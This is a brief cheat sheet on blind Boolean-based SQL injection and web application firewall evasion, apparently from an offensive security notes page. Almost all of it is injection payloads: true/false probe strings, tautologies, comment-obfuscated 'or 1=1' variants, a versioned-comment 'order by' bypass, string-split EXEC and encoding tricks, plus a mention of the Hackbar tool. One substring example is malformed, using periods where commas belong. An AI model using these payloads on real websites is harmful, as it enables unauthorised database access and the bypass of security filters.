Blind Boolean based SQL & Evasion Techniques
Blind Boolean based SQL
11' and 'N' = 'N TRUE
11' and 'N'= 'A False
substring('Ahmed'.1.1)='A' => True
Evasion Techniques
WAF
' or 1-1 --+
or 2>1
'or 'hacktor'>'a'
'/*!12345order*/by 7#
url encode,hex etc..
EXEC('sele','ct')
"UNION SELECT"
'/**/or/**/1/**/=/**/1/**/
Hackbar => Cyberfox
Last updated